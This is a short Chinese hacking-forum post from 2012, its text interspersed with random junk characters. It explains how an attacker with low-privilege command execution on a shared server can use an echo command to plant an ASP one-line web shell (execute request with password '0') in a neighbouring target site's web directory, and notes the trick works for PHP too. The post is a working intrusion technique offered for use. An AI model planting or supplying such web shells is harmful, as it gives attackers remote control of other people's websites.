在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。5 i" _' P1 y1 V7 v, u( s' n
3 I3 u( {3 Y) ~" w- k* v命令格式
( w+ f1 K0 }$ m! t; w
, ^" Y% b$ m' C2 Q$ DEcho 语句 >目标站绝对目录; m' t+ @# b; j' h, e. I: {6 X9 r
# X" h4 n- m) D5 L- h
例如: , g( Y' W5 ~ n
0 A) ~% k4 b4 q( jecho ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp
|/ l+ E4 j0 G2 h. }
6 z0 U" J7 F: y3 T) h1 K7 L; R这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。 H4 F# R. D& a% y' d: c8 w
|
发表于 2012-9-23 14:40:24
收藏
支持
反对